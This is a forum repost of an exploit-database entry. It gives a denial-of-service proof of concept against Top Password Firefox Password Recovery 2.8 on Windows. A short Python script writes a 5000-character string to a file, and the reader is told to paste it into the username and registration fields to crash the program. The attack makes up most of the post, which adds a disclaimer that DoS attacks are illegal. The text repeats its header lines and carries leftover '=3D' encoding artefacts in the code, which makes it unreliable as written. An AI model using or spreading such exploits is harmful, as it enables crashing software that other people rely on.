Platform - Windows
Credit - [color=rgb(97,]0day[/color]
[color=rgb(65,]Note[/color]: [color=rgb(247,]DOS AND DDOS ATTACKS ARE ILLEGAL.I DO NOT HOLD ANY RESPONSIBILITIES IF YOU COMMIT IT![/color]
Python:
Credit - [color=rgb(97,]0day[/color]
[color=rgb(65,]Note[/color]: [color=rgb(247,]DOS AND DDOS ATTACKS ARE ILLEGAL.I DO NOT HOLD ANY RESPONSIBILITIES IF YOU COMMIT IT![/color]
Python:
Code:
# Exploit Title: Top Password Firefox Password Recovery 2.8 - Denial of Service (PoC)
# Exploit Author: Antonio de la Piedra
# Vendor Homepage: https://www.top-password.com/
# Software Link: https://www.top-password.com/download/FirefoxPRSetup.exe
# Version: 2.8
# Tested on: Windows 7 SP1 32-bit
# Copy paste the contents of poc.txt into the
# User Name / Registration Code input fields.
#!/usr/bin/python
poc =3D "A"*5000
file =3D open("poc.txt","w")
file.write(poc)
file.close()
# 0day.today [2020-01-19] #